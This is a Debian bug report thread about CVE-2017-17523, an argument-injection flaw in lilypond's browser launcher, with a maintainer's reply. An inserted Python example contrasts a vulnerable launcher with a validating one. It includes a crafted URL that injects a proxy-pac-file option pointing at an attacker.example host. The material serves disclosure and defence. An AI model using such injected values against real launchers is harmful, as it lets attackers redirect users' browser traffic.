Bug#884136: lilypond: CVE-2017-17523


Salvatore Bonaccorso
Source: lilypond
Version: 2.18.2-4
Severity: important
Tags: security upstream

Hi,

the following vulnerability was published for lilypond.

For a description of the issue see [1], in the "Similar
vulnerabilities in other packages" section.

CVE-2017-17523[0]:
| lilypond-invoke-editor in LilyPond 2.19.80 does not validate strings
| before launching the program specified by the BROWSER environment
| variable, which allows remote attackers to conduct argument-injection
| attacks via a crafted URL, as demonstrated by a --proxy-pac-file
| argument.

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2017-17523
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17523
[1] https://bugs.debian.org/881767

Regards,
Salvatore
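The CVE text above describes the bug pattern in one sentence: a URL that the program has not validated is appended to the command line built from $BROWSER, so a URL that starts with "--" is parsed by the browser as an option rather than as a page to open. The following is an added example, not LilyPond's own code (lilypond-invoke-editor is a Guile script; this is a Python model of the same launcher pattern). The browser argument parser, the constructed crafted URL and the allowed-scheme list are assumptions made for the example; the hardening shown is a generic check, not the fix adopted upstream.

```python
"""
Model of the argument-injection pattern behind CVE-2017-17523 (added example,
not LilyPond code): a launcher that passes an unvalidated URL to $BROWSER,
beside a launcher that validates the URL first.
"""
import re
import shlex
from typing import Dict, List, Optional

# Assumption for this example: the schemes a LilyPond-style launcher would
# legitimately hand to a browser (textedit:// is LilyPond's point-and-click URL).
ALLOWED_SCHEMES = ("http", "https", "file", "textedit")

# Constructed sample input mirroring the CVE's example: a "URL" that is really
# a browser option pointing at an attacker-controlled proxy auto-config file.
CRAFTED_URL = "--proxy-pac-file=http://attacker.example/evil.pac"


def build_browser_argv_vulnerable(browser: str, url: str) -> List[str]:
    """The vulnerable pattern: split $BROWSER into words and append the URL as-is.

    Nothing stops the URL from being an option; whatever the browser's parser
    makes of it is what runs.
    """
    return shlex.split(browser) + [url]


def validate_url(url: str) -> Optional[str]:
    """Return a reason to refuse the URL, or None if it is safe to pass as an argument."""
    if url.startswith("-"):
        return "argument looks like a command-line option"
    m = re.match(r"^([A-Za-z][A-Za-z0-9+.-]*):", url)
    if not m:
        return "no URL scheme"
    scheme = m.group(1).lower()
    if scheme not in ALLOWED_SCHEMES:
        return f"scheme {scheme!r} not allowed"
    if any(ch in url for ch in " \t\r\n\"'"):
        return "whitespace or quote characters in URL"
    return None


def build_browser_argv_hardened(browser: str, url: str) -> List[str]:
    """Same launcher, but the URL is validated before it reaches argv.

    Validation is the defence here: relying on a '--' end-of-options marker
    would depend on every possible $BROWSER honouring it.
    """
    reason = validate_url(url)
    if reason is not None:
        raise ValueError(f"refusing to launch browser: {reason}: {url!r}")
    return shlex.split(browser) + [url]


def parse_browser_args(argv: List[str]) -> Dict[str, object]:
    """Toy model of a browser's argv handling (constructed for this example,
    not real browser code): '--name=value' is an option, anything else is a
    URL to open. It is enough to show why a leading '--' matters."""
    options: Dict[str, str] = {}
    urls: List[str] = []
    for arg in argv[1:]:
        if arg.startswith("--"):
            name, _, value = arg[2:].partition("=")
            options[name] = value
        else:
            urls.append(arg)
    return {"options": options, "urls": urls}


def demo() -> Dict[str, object]:
    """Run both launchers on the crafted URL and report what the browser would see."""
    injected = parse_browser_args(build_browser_argv_vulnerable("chromium", CRAFTED_URL))
    try:
        build_browser_argv_hardened("chromium", CRAFTED_URL)
        blocked = False
    except ValueError:
        blocked = True
    return {"vulnerable_sees": injected, "hardened_blocked": blocked}


if __name__ == "__main__":
    print(demo())
```

With the crafted input the vulnerable launcher produces an argv in which the browser sees a proxy-pac-file option and no URL at all, which is exactly the CVE's "argument injection"; the hardened launcher refuses the string before any process is started. A plain textedit:// or https:// URL passes validation unchanged.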


Bug#884136: lilypond: CVE-2017-17523

Don Armstrong
Control: forward -1 https://sourceforge.net/p/testlilyissues/issues/5243/

On Mon, 11 Dec 2017, Salvatore Bonaccorso wrote:
> If you fix the vulnerability please also make sure to include the
> CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

Thanks! This is being addressed upstream in
https://sourceforge.net/p/testlilyissues/issues/5243/; as soon as there
is a fix there with review, we'll backport it.

--
Don Armstrong                      https://www.donarmstrong.com

What prison taught me was that some people are born into a life where
they're going to be subjected to intense life experiences and personal
tragedy on an almost daily basis. [...] I don't think you get
enlightenment after something like that. I think all anyone really
wants, if they're honest with themselves, is a quiet, easy life
surrounded by people that love them. Anything else is a conceit.
 -- OP from 99chan